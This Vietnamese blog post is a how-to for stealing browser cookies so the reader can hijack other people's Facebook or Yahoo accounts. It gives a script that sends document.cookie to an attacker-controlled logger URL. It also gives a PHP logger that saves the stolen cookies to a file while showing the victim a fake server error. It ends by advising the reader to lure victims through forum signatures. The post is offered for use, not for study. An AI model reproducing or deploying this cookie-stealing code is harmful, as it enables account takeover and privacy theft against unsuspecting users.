Lấy trộm Cookie để làm gì? để đăng nhập ngoài sự cho phép của họ rồi làm gì là việc của bạn chẳng hạn hack acc facebook,yahoo,....
Đầu tiên mở notepad cho vào đoạn code sau rồi lưu với 1 tên bất kì..Giả sử là HACKER.gif
<script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>
Tiếp tục copy đoạn code sau cho vào notepad và lưu lại với tên cookielogger.php:
<?php$filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) {echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?>
Tạo thêm 1 file là logfile.txt rồi vất cả 3 file lên host. Chmod lại file logfile.txt 777 để có quyền ghi lên nó.
cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) HACKER.gif -> http://www.yoursite.com/HACKER.gif
Rồi đi tìm victim dụ thôi.Ví dụ như chèn đoạn code này vào chữ kí ở forum chẳng hạn.Ngồi chờ tên nào rãnh kích vào và thịt thôi
Không có nhận xét nào:
Đăng nhận xét